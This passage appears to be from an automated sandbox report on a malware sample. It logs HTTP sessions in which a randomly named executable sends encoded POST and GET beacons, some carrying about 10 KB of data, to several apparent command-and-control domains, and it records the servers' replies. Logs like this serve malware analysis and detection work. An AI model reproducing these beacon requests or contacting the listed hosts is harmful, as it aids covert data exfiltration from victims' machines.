                                                                25192.168.2.450009104.21.96.1804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:39.058865070 CET714OUTPOST /1a34/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.mffnow.info
                                                                Origin: http://www.mffnow.info
                                                                Referer: http://www.mffnow.info/1a34/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 5a 6a 73 53 6d 6d 35 5a 46 51 33 42 65 52 6a 61 43 39 31 6d 4e 74 49 4c 7a 55 69 62 4a 30 78 44 68 34 30 35 75 46 31 70 78 4b 63 53 48 4c 35 46 49 4f 58 2b 38 63 67 2b 6c 33 39 63 75 78 65 79 4b 2f 6a 32 70 4b 58 42 30 56 64 4f 37 68 7a 51 41 2b 6e 42 6a 78 62 44 58 36 39 4c 75 48 74 42 4c 59 4a 52 39 39 51 67 44 57 63 49 71 51 62 73 54 5a 6a 53 74 55 74 6b 61 4f 38 42 45 47 35 75 78 74 50 6e 36 71 2b 6a 65 35 2b 52 69 33 64 71 36 64 39 31 65 64 68 74 58 72 48 56 6f 39 5a 6e 42 6b 54 74 47 6b 77 30 53 72 45 4b 54 4a 38 6e 38 6c 70 64 55 76 4a 4c 69 5a 47 77 6d 48 4c 2b 30 77 3d 3d
                                                                Data Ascii: pFYX4n=ZjsSmm5ZFQ3BeRjaC91mNtILzUibJ0xDh405uF1pxKcSHL5FIOX+8cg+l39cuxeyK/j2pKXB0VdO7hzQA+nBjxbDX69LuHtBLYJR99QgDWcIqQbsTZjStUtkaO8BEG5uxtPn6q+je5+Ri3dq6d91edhtXrHVo9ZnBkTtGkw0SrEKTJ8n8lpdUvJLiZGwmHL+0w==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.450016104.21.96.1804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:41.716197968 CET734OUTPOST /1a34/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.mffnow.info
                                                                Origin: http://www.mffnow.info
                                                                Referer: http://www.mffnow.info/1a34/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 5a 6a 73 53 6d 6d 35 5a 46 51 33 42 50 41 54 61 42 65 74 6d 4b 4e 49 45 32 55 69 62 41 55 78 50 68 34 34 35 75 41 46 35 78 34 6f 53 48 72 4a 46 4c 4e 50 2b 2f 63 67 2b 74 58 38 59 7a 42 65 74 4b 2f 76 45 70 4b 62 42 30 56 35 4f 37 67 44 51 41 74 2f 47 69 68 62 42 61 61 39 46 78 33 74 42 4c 59 4a 52 39 39 73 4b 44 57 45 49 71 6c 4c 73 52 39 33 54 78 6b 74 6c 4b 2b 38 42 4f 57 35 71 78 74 50 4a 36 72 69 61 65 37 47 52 69 79 35 71 37 4d 39 32 51 64 67 6b 4b 37 47 56 6e 59 6f 54 62 56 65 61 44 55 68 56 64 37 45 46 62 76 78 39 74 55 49 4b 47 76 74 34 2f 65 50 45 72 45 32 33 76 38 4e 39 56 63 4c 42 42 72 54 6a 41 49 33 49 63 62 62 2b 4c 57 51 3d
                                                                Data Ascii: pFYX4n=ZjsSmm5ZFQ3BPATaBetmKNIE2UibAUxPh445uAF5x4oSHrJFLNP+/cg+tX8YzBetK/vEpKbB0V5O7gDQAt/GihbBaa9Fx3tBLYJR99sKDWEIqlLsR93TxktlK+8BOW5qxtPJ6riae7GRiy5q7M92QdgkK7GVnYoTbVeaDUhVd7EFbvx9tUIKGvt4/ePErE23v8N9VcLBBrTjAI3Icbb+LWQ=


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.450022104.21.96.1804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:44.377321959 CET10816OUTPOST /1a34/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.mffnow.info
                                                                Origin: http://www.mffnow.info
                                                                Referer: http://www.mffnow.info/1a34/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 5a 6a 73 53 6d 6d 35 5a 46 51 33 42 50 41 54 61 42 65 74 6d 4b 4e 49 45 32 55 69 62 41 55 78 50 68 34 34 35 75 41 46 35 78 34 77 53 45 5a 42 46 4c 74 7a 2b 2b 63 67 2b 6a 33 38 56 7a 42 65 67 4b 2f 6e 36 70 4b 48 33 30 58 78 4f 37 43 4c 51 52 73 2f 47 6f 68 62 42 54 36 39 49 75 48 73 46 4c 59 5a 56 39 37 4d 4b 44 57 45 49 71 6b 37 73 57 70 6a 54 69 30 74 6b 61 4f 38 7a 45 47 35 53 78 74 6e 2f 36 6f 4f 4b 65 4b 6d 52 69 53 70 71 35 2b 46 32 63 64 67 6d 4c 37 47 37 6e 59 73 4d 62 52 2b 73 44 58 38 41 64 35 59 46 62 75 59 78 36 6e 74 53 64 38 4d 71 71 70 54 55 77 32 36 45 78 37 56 31 57 38 69 62 61 71 66 36 45 71 75 67 48 4a 72 54 57 32 7a 38 39 4a 72 35 38 79 70 36 56 71 43 42 4b 49 2f 69 35 77 52 65 67 2b 33 54 35 36 48 39 6b 38 67 77 49 73 55 77 69 4a 52 64 76 59 53 76 43 35 45 4f 53 67 45 69 4e 61 6d 75 6e 6c 31 6b 68 73 36 6b 31 66 62 41 79 72 7a 75 59 58 42 33 54 72 67 43 38 54 6e 55 51 6d 31 6e 75 61 74 57 30 61 34 63 6f 56 31 78 4d 43 73 30 4b 66 44 6e 7a 54 73 67 43 70 53 [TRUNCATED]
                                                                Data Ascii: pFYX4n=ZjsSmm5ZFQ3BPATaBetmKNIE2UibAUxPh445uAF5x4wSEZBFLtz++cg+j38VzBegK/n6pKH30XxO7CLQRs/GohbBT69IuHsFLYZV97MKDWEIqk7sWpjTi0tkaO8zEG5Sxtn/6oOKeKmRiSpq5+F2cdgmL7G7nYsMbR+sDX8Ad5YFbuYx6ntSd8MqqpTUw26Ex7V1W8ibaqf6EqugHJrTW2z89Jr58yp6VqCBKI/i5wReg+3T56H9k8gwIsUwiJRdvYSvC5EOSgEiNamunl1khs6k1fbAyrzuYXB3TrgC8TnUQm1nuatW0a4coV1xMCs0KfDnzTsgCpS+UUpUm8MENZQixEQEg/KjM2epmNsw5Y5DpufchLoTvS4kF8W1MoGR+eCCoOKa+4suO8yLzRuz2ti/MaEXCaT+OF+whj+jtWXR8Yr74UiJtx5jnDrZERyeGiX3xrWZQpgxh7rXC1gmgfAWG2KYEG2cL8gMXqRfC4OeYTVJXd4kKzDJGlDM+hMOKdmkw+MIxw7G6es+sHZYKe/ian2JR0hes8306MAw18y6y7CKcYS5w0b5XC2yN5LlByyNFCbuBBA2+mQ6alNHO/yjwb/Zbcw9NyTVUg05NMD8FRTyCCLF7bSfEj3eczDdgn8pDBT5R/Jz6ZEgD8uk5vJSA49uYz0GeVHj5DJDfkP+xfdkDOf9YT6dpU22ucABg3HtZn2MKz2UUYb//aGVSzqKXbhQbWeWiLZkyj9lS7+NgkmCtH5AJLbNWACu1rIYjRs4DcUpqzwRM4A8dOOTnY25peM/mUaNRLcHYN78YLMHYsmKZFt0xDUT5/qRUXHjVDAbsrULIkqWMaSYQGUVKqghdxhIFS/DTauuKdBhl+5PlReX1fUpjqZ5n+ahrRJ+1+qzNlhZhdIVq0FkjJJwahS7AyyG64pwuTgKZPrAOZ4DNZmDFYp8VzZ/vwih+hYgAhtSNRYiZMHOj+hKQoFzRyDb/FJO6KjZZ1GGDuEv3VfkO [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.450030104.21.96.1804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:47.038271904 CET452OUTGET /1a34/?rr7x1=pT0pWliPV&pFYX4n=UhEylRAMCxjlfkeBHdFlA8MxzAi/en4irJRYrSpl2vEmDrtdD83fz84LtzcmrW6WKOP6wZH/8TlB0y+yX7XcsnikQaxLyzpTE5F2560XH3FMkHnsZc7Ll0Y= HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.mffnow.info
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:19:49.366020918 CET758INHTTP/1.1 567 unknown
                                                                Date: Tue, 10 Dec 2024 11:19:49 GMT
                                                                Content-Length: 17
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxKClv1MiwCyWYpMFJKWtVnSrWhQnMenTk%2BGlWbLRj2Tr6wj%2FHOxgHzWwLh8IsxHK9K%2Fxo4geSsQfYEctsdyBzcHivTiiXbiK0Zfx7BPC30LdxC%2FNT21DL6u%2F2rWERB%2BWrk%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8efcd78cdf9ec352-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1464&rtt_var=732&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=452&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                Data Ascii: Request too large


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.45003513.248.169.48804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:55.164891958 CET717OUTPOST /hrap/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.remedies.pro
                                                                Origin: http://www.remedies.pro
                                                                Referer: http://www.remedies.pro/hrap/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 7a 79 33 50 58 4b 44 37 61 6d 31 70 45 65 4e 4e 6a 42 47 6f 32 70 61 68 69 65 67 75 48 56 34 66 38 78 35 63 53 72 53 56 68 39 34 43 48 4d 2f 71 6c 48 67 42 46 69 73 6f 57 61 4c 57 53 45 4c 56 6e 53 70 56 77 77 78 47 4d 36 73 79 4b 79 78 6c 69 56 2f 2b 6a 74 4c 35 78 43 54 4b 4d 76 64 4e 38 52 45 2b 52 46 5a 2f 69 51 43 33 42 33 56 54 36 53 70 44 57 61 53 32 39 54 7a 48 78 6d 6b 57 30 52 54 4b 46 71 39 4c 65 65 49 53 6e 6c 77 43 75 70 69 72 6e 4c 50 67 48 34 72 61 73 72 53 51 68 33 48 2f 64 59 65 56 59 75 39 4a 38 6c 59 6e 67 39 4f 6d 6a 63 34 63 33 62 7a 6f 38 54 37 7a 56 77 3d 3d
                                                                Data Ascii: pFYX4n=zy3PXKD7am1pEeNNjBGo2pahieguHV4f8x5cSrSVh94CHM/qlHgBFisoWaLWSELVnSpVwwxGM6syKyxliV/+jtL5xCTKMvdN8RE+RFZ/iQC3B3VT6SpDWaS29TzHxmkW0RTKFq9LeeISnlwCupirnLPgH4rasrSQh3H/dYeVYu9J8lYng9Omjc4c3bzo8T7zVw==
                                                                Dec 10, 2024 12:19:56.248682022 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.45003613.248.169.48804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:57.823973894 CET737OUTPOST /hrap/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.remedies.pro
                                                                Origin: http://www.remedies.pro
                                                                Referer: http://www.remedies.pro/hrap/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 7a 79 33 50 58 4b 44 37 61 6d 31 70 4c 65 39 4e 76 43 75 6f 77 4a 61 67 38 4f 67 75 4e 31 34 54 38 78 31 63 53 76 43 46 67 50 73 43 47 74 50 71 6a 79 55 42 57 53 73 6f 65 36 4c 54 57 45 4b 58 6e 53 6c 33 77 77 39 47 4d 2b 45 79 4b 7a 42 6c 69 6b 2b 4d 78 4e 4c 2f 33 43 54 49 44 50 64 4e 38 52 45 2b 52 46 4e 46 69 51 71 33 43 47 46 54 37 7a 70 41 63 36 53 78 2b 54 7a 48 31 6d 6b 53 30 52 54 6b 46 76 6c 74 65 64 77 53 6e 67 4d 43 74 38 57 6f 75 4c 50 6d 4b 59 72 45 72 4a 54 4a 6e 53 33 78 66 4c 2b 55 63 4d 52 37 77 44 56 39 78 4d 76 78 78 63 63 76 71 63 36 63 78 51 47 36 4f 34 6a 72 6d 57 48 4d 6f 6e 55 57 47 72 47 6b 35 68 4e 51 6c 55 67 3d
                                                                Data Ascii: pFYX4n=zy3PXKD7am1pLe9NvCuowJag8OguN14T8x1cSvCFgPsCGtPqjyUBWSsoe6LTWEKXnSl3ww9GM+EyKzBlik+MxNL/3CTIDPdN8RE+RFNFiQq3CGFT7zpAc6Sx+TzH1mkS0RTkFvltedwSngMCt8WouLPmKYrErJTJnS3xfL+UcMR7wDV9xMvxxccvqc6cxQG6O4jrmWHMonUWGrGk5hNQlUg=
                                                                Dec 10, 2024 12:19:58.906974077 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.45003713.248.169.48804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:00.483232975 CET10819OUTPOST /hrap/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.remedies.pro
                                                                Origin: http://www.remedies.pro
                                                                Referer: http://www.remedies.pro/hrap/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 7a 79 33 50 58 4b 44 37 61 6d 31 70 4c 65 39 4e 76 43 75 6f 77 4a 61 67 38 4f 67 75 4e 31 34 54 38 78 31 63 53 76 43 46 67 50 55 43 48 66 48 71 67 52 4d 42 48 69 73 6f 55 61 4c 53 57 45 4c 50 6e 52 56 7a 77 77 67 7a 4d 38 4d 79 49 52 4a 6c 6b 57 57 4d 37 4e 4c 2f 31 43 54 4e 4d 76 64 59 38 52 55 36 52 46 64 46 69 51 71 33 43 45 74 54 34 69 70 41 61 36 53 32 39 54 7a 44 78 6d 6b 36 30 53 6a 53 46 75 51 57 66 73 51 53 6e 41 38 43 72 4f 2b 6f 68 4c 50 6b 4a 59 71 58 72 4a 66 73 6e 54 65 4f 66 4b 62 78 63 4e 70 37 68 57 4d 43 6b 66 62 59 7a 76 64 79 70 4f 32 45 32 43 43 6b 58 4a 76 43 76 6a 61 58 39 54 56 30 65 34 58 78 6c 78 49 56 37 67 6d 2f 74 6a 68 71 33 5a 68 6a 63 4e 63 55 32 76 73 44 32 63 66 44 76 63 35 39 66 7a 37 55 69 44 62 65 77 75 67 78 69 50 2b 70 69 44 39 75 73 69 6b 70 53 6c 6f 31 46 66 70 78 75 42 6f 32 42 69 6f 30 72 6a 67 74 75 4d 6f 59 74 2f 73 76 54 61 55 6e 4b 68 54 56 46 39 35 55 31 72 63 4d 4d 48 6a 68 64 72 62 6f 4f 4c 51 46 6a 4f 37 73 4c 31 4b 68 33 61 4c [TRUNCATED]
                                                                Data Ascii: pFYX4n=zy3PXKD7am1pLe9NvCuowJag8OguN14T8x1cSvCFgPUCHfHqgRMBHisoUaLSWELPnRVzwwgzM8MyIRJlkWWM7NL/1CTNMvdY8RU6RFdFiQq3CEtT4ipAa6S29TzDxmk60SjSFuQWfsQSnA8CrO+ohLPkJYqXrJfsnTeOfKbxcNp7hWMCkfbYzvdypO2E2CCkXJvCvjaX9TV0e4XxlxIV7gm/tjhq3ZhjcNcU2vsD2cfDvc59fz7UiDbewugxiP+piD9usikpSlo1FfpxuBo2Bio0rjgtuMoYt/svTaUnKhTVF95U1rcMMHjhdrboOLQFjO7sL1Kh3aLWwcQudunhuVm6AxYCNhLtrDd6flF7F1F1LjEdbTluumrX9V6HpR3w/MjVzUgn0lEZ2lMbmONOhuWGmVIlnTPrBmeasAeC5MSAsw0aEYj6MlpGYxpDGyH57osXK6qT2lCRKaNQsH+AuLOuHXScBjnAWAH0zx494o8YNOlGLCpgr16X7UqsFmBziLvWhB6gqzF2wH80BBIfJKEIAiJA37bwgzkcb2lmVZIOe6sx22khPKnHRPAbrJJAyBf9HZNi6G1pyDXTrFbGWI8JNzvln6B085vslthQGt82O6xZH32gbGxicdpzjvHRGGr40h4rqGKTm7kxLVX9AawXZEU+gOuoqDPmXlo3Elf8V5JFcWjvoW/gNHLaRYLtrpudVKlpE2DMR5YtfadCtYqy/sk5LVWg99C4UvEOoQ1vZL7KgISZn8NuLRmRoKY/T+DBdjcNGKXRQaOxFl9hwxXT6ZbSE0b3dJ7D2P7EpTqN8S136AJasJupgEo4ERc6791GhzTnbJ3k08xDp8Qsc3HlH6kte2xqQQPKGpG5bwaMK1Q048uCGoWGZbr368kpn80Dm8ORgZN35wIAiyvyaL+vL9A0MNlWqtBdfO6PLr1CQB+SrzpfVNTM8qCJw8ebn8RQOOyahptR/sSsdquzneGiAIptN7jynskOi2e56BK9d [TRUNCATED]
                                                                Dec 10, 2024 12:20:01.566864967 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.45003813.248.169.48804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:03.149821997 CET453OUTGET /hrap/?pFYX4n=+wfvU+r0fXNkfp8ouz3K6IfbsPoraFQS1hMsf4OYg5wyJviJ8QUrWR8xRt/3ckLtqjVE/R9SKLQENxs3rgGq786i5xTgYLx/0ho5ZVxAsh3OM1RI6yAeR+s=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.remedies.pro
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:20:13.262711048 CET379INHTTP/1.1 200 OK
                                                                content-type: text/html
                                                                date: Tue, 10 Dec 2024 11:20:13 GMT
                                                                content-length: 258
                                                                connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 46 59 58 34 6e 3d 2b 77 66 76 55 2b 72 30 66 58 4e 6b 66 70 38 6f 75 7a 33 4b 36 49 66 62 73 50 6f 72 61 46 51 53 31 68 4d 73 66 34 4f 59 67 35 77 79 4a 76 69 4a 38 51 55 72 57 52 38 78 52 74 2f 33 63 6b 4c 74 71 6a 56 45 2f 52 39 53 4b 4c 51 45 4e 78 73 33 72 67 47 71 37 38 36 69 35 78 54 67 59 4c 78 2f 30 68 6f 35 5a 56 78 41 73 68 33 4f 4d 31 52 49 36 79 41 65 52 2b 73 3d 26 72 72 37 78 31 3d 70 54 30 70 57 6c 69 50 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pFYX4n=+wfvU+r0fXNkfp8ouz3K6IfbsPoraFQS1hMsf4OYg5wyJviJ8QUrWR8xRt/3ckLtqjVE/R9SKLQENxs3rgGq786i5xTgYLx/0ho5ZVxAsh3OM1RI6yAeR+s=&rr7x1=pT0pWliPV"}</script></head></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.450039212.123.41.108804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:19.524094105 CET741OUTPOST /fvpb/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.caj-bioteaque.online
                                                                Origin: http://www.caj-bioteaque.online
                                                                Referer: http://www.caj-bioteaque.online/fvpb/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 70 77 5a 62 32 78 65 70 59 68 6a 63 36 34 73 79 71 59 31 57 4d 64 4c 57 70 70 4d 72 64 79 7a 39 4b 41 65 39 70 54 62 70 46 32 68 78 4a 5a 59 59 4d 64 4c 7a 36 38 64 31 45 73 4c 7a 54 66 4f 79 76 57 44 47 54 6a 76 2f 65 63 73 36 42 7a 4a 4f 6d 4f 44 46 66 71 73 6f 55 4d 7a 54 65 78 57 2b 57 33 73 63 44 4b 63 51 2b 32 79 73 70 6c 7a 72 59 67 58 35 70 54 2b 54 6c 48 4c 6e 59 2b 4d 30 53 74 58 54 5a 43 6f 56 59 36 5a 67 69 74 53 6c 62 42 55 4a 6f 7a 2f 4a 36 51 51 76 42 62 6f 4f 6b 35 6f 66 75 76 59 45 71 76 66 54 6e 4f 2f 35 45 6f 7a 69 47 42 52 43 7a 57 70 67 34 61 34 43 4b 77 3d 3d
                                                                Data Ascii: pFYX4n=pwZb2xepYhjc64syqY1WMdLWppMrdyz9KAe9pTbpF2hxJZYYMdLz68d1EsLzTfOyvWDGTjv/ecs6BzJOmODFfqsoUMzTexW+W3scDKcQ+2ysplzrYgX5pT+TlHLnY+M0StXTZCoVY6ZgitSlbBUJoz/J6QQvBboOk5ofuvYEqvfTnO/5EoziGBRCzWpg4a4CKw==
                                                                Dec 10, 2024 12:20:20.618599892 CET670INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.18.0
                                                                Date: Tue, 10 Dec 2024 11:41:36 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                ETag: W/"5d07e874-36b"
                                                                Content-Encoding: gzip
                                                                Data Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a [TRUNCATED]
                                                                Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.450040212.123.41.108804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:22.234808922 CET761OUTPOST /fvpb/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
